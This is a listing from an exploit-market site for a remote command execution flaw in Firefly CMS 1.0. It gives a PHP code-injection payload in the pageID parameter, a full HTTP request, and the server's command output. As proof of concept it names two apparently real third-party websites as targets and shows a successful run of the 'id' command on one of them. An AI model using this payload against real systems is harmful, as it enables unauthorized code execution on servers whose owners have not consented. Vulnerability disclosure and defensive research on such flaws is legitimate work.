[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Firefly CMS 1.0 Remote Command Execution Exploit

Author
Felipe Andrian Peixoto
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-32680
Category
web applications
Date add
14-05-2019
Platform
php
[+] Remote Comand Execution on Firefly CMS v. 1.0

[+] Date: 11/05/2019

[+] CWE number: CWE-78

[+] Risk: High

[+] Author: Felipe Andrian Peixoto

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Vendor Homepage: https://fireflydigital.com/

[+] Vulnerable File: site.php

[+] Version : 1.0

[+] Exploit: http://host/patch/site.php?pageID={${system(%27id%27)}}

[+] PoC: https://www.volalaw.com/site.php?pageID={${system(%27id%27)}}
         https://www.beltsforanything.com/site.php?pageID={${system(%27id%27)}}

[+] Example Request:

  GET /site.php?pageID={${system(%27id%27)}} HTTP/1.1
  Host: www.volalaw.com
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate, br
  DNT: 1
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1

  <html>
  <head>
  <title></title>
  <meta http-equiv="Content-Type" content="text/html;">
  <link rel="stylesheet" href="bug.css" type="text/css">
  </head>
  <body text="#000000" bgcolor="#F6EEE1" link="#008080" vlink="#808080" alink="#000080" background="templates/images/bkgd.jpg">

  <table border="0" width="100%" cellspacing="0" cellpadding="0" align="center">
    <tr valign="top"> 
      <td class="body_links">uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
  </td>
    </tr>
  </table>
  </body>
  </html>

[+] More About : http://cwe.mitre.org/data/definitions/78.html

#  0day.today [2024-12-24]  #